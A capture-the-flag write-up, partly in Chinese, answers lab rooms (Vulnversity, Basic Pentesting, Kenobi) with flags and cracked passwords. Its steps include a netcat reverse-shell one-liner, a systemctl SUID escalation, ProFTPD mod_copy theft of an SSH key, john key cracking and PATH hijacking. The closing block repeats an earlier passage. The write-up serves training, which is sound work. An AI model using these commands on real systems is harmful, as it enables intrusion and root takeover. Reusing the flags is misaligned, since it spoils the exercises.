Basic Computer Exploitation
文章目录
Vulnversity ⭐️反弹shell ⭐️systemctl提权
task1 Deploy the machine
无需回答
task2 Reconnaissance
1.There are many nmap “cheatsheets” online that you can use too.
无需回答
2.Scan the box, how many ports are open?
6
3.What version of the squid proxy is running on the machine?
3.5.12
4.How many ports will nmap scan if the flag -p-400 was used?
400
5.Using the nmap flag -n what will it not resolve?
DNS
-n 禁用DNS反向解析
6.What is the most likely operating system this machine is running?
Ubuntu
7.What port is the web server running on?
3333
task3 Locating directories using GoBuster
1.What is the directory that has an upload form page?
/internal/
task4 Compromise the webserver
1.Try upload a few file types to the server, what common extension seems to be blocked?
.php
2.Run this attack, what extension is allowed?
.phtml
3.What is the name of the user who manages the webserver?
bill
4.What is the user flag?
task5 Privilege Escalation
1.On the system, search for all SUID files. What file stands out?
/bin/systemctl
find / -user root -perm -4000 -exec ls -ldb {} ; 查找系统所有无法访问的文件
/bin/systemctl 文件具备suid位可以用来提权
2.Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?
Become root and get the last flag (/root/root.txt)
a58ff8579f0a9270368d33a9966c7fd5
www-data@vulnuniversity:/tmp$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.23.70 7788 >/tmp/f" > /tmp/shell.sh www-data@vulnuniversity:/tmp$ TF=$(mktemp).service www-data@vulnuniversity:/tmp$ echo '[Service] > Type=oneshot > ExecStart=/bin/sh -c "bash /tmp/shell.sh" > [Install] > WantedBy=multi-user.target' > $TF www-data@vulnuniversity:/tmp$ /bin/systemctl link $TF Created symlink from /etc/systemd/system/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service. www-data@vulnuniversity:/tmp$ /bin/systemctl enable --now $TF Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.CHTuvfkaoz.service to /tmp/tmp.CHTuvfkaoz.service.
提权思路 /bin/systemctl文件拥有sudo权限,新建一个service让systemctl加载服务,即可执行任意脚本
Basic Pentesting
Task1 Web App Testing and Privilege Escalation
1.Deploy the machine and connect to our network
2.Find the services exposed by the machine
3.What is the name of the hidden directory on the web server(enter name without /)?
development
4.User brute-forcing to find the username & password
5.What is the username?
jan
使用enum4linux枚举用户得到
共享目录 //10.10.76.103/Anonymous
6.What is the password?
armando
7.What service do you use to access the server(answer in abbreviation in all caps)?
SSH
8.Enumerate the machine to find any vectors for privilege escalation
9.What is the name of the other user you found(all lower case)?
kay
10.If you have found another user, what can you do with this information?
john破解OpenSSH私钥密码
1.ssh2john将id_rsa转换为john可读取的模式
ssh2john id_rsa > rsacrack
2.使用rockyou.txt爆破私钥密码
john rsacrack --wordlists=%字典%
11.What is the final password you obtain?
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Kenobi ⭐️SMB
task1 Deploy the vulnerable machine
1.Make sure you’re connected to our network and deploy the machine
2.Scan the machine with nmap, how many ports are open?
7
task2 Enumerating Samba for shares
1.Using the nmap command above, how many shares have been found?
3
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.162.162 使用脚本扫描445端口
2.On most distributions of Linux smbclient is already installed. Lets inspect one of the shares.
smbclient //<ip>/anonymous
Once you’re connected, list the files on the share. What is the file can you see?
log.txt
3.Open the file on the share. There is a few interesting things found.
- Information generated for Kenobi when generating an SSH key for the user
- Information about the ProFTPD server.
What port is FTP running on?
21
4.Your earlier nmap port scan will have shown port 111 running the service rpcbind. This is just a server that converts remote procedure call (RPC) program number into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number its prepared to serve.
In our case, port 111 is access to a network file system. Lets use nmap to enumerate this.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount MACHINE_IP
What mount can we see?
/var
task3 Gain initial access with ProFtpd ⭐️ProFtpd
1.Lets get the version of ProFtpd. Use netcat to connect to the machine on the FTP port.
What is the version?
1.3.5
2.We can use searchsploit to find exploits for a particular software version.
Searchsploit is basically just a command line search tool for exploit-db.com.
How many exploits are there for the ProFTPd running?
3
3.You should have found an exploit from ProFtpd’s mod_copy module.
The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.
从log.txt文件中得知密钥地址和共享地址
nc连接21端口
nc 10.10.34.242 21
再执行命令,复制密钥文件至共享目录,再下载,使用密钥文件登录kenobi账号
site cpfr /home/kenobi/.ssh/id_rsa
site cpto /home/kenobi/share/id_rsa
4.We knew that the /var directory was a mount we could see (task 2, question 4). So we’ve now moved Kenobi’s private key to the /var/tmp directory.
5.mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
What is Kenobi’s user flag (/home/kenobi/user.txt)?
d0b0f3f53b6caa532a83915e19224899
task4 Privilege Escalation with Path Variable Manipulation ⭐️环境变量提权
1.To search the a system for these type of files run the following: find / -perm -u=s -type f 2>/dev/null
What file looks particularly out of the ordinary?
/usr/bin/menu
2.Run the binary, how many options appear?
3
3.We copied the /bin/sh shell, called it curl, gave it the correct permissions and then put its location in our path. This meant that when the /usr/bin/menu binary was run, its using our path variable to find the “curl” binary… Which is actually a version of /usr/sh, as well as this file being run as root it runs our shell as root!
提权条件: -rwsr-xr-x menu
文件执行时会在环境变量中查找curl,自建curl文件赋予可执行权限,至于可写目录加入环境变量中替代curl程序以root权限执行即可提权.
export PATH=/tmp:$PATH
将/tmp目录写入环境变量
4.What is the root flag (/root/root.txt)?
177b3cd8562289f37382721c28381f02
a version of /usr/sh, as well as this file being run as root it runs our shell as root!
提权条件: -rwsr-xr-x menu
文件执行时会在环境变量中查找curl,自建curl文件赋予可执行权限,至于可写目录加入环境变量中替代curl程序以root权限执行即可提权.
export PATH=/tmp:$PATH
将/tmp目录写入环境变量
4.What is the root flag (/root/root.txt)?
177b3cd8562289f37382721c28381f02